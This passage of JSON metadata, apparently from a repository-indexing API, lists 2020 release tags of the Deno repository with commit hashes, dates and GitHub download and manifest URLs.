tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/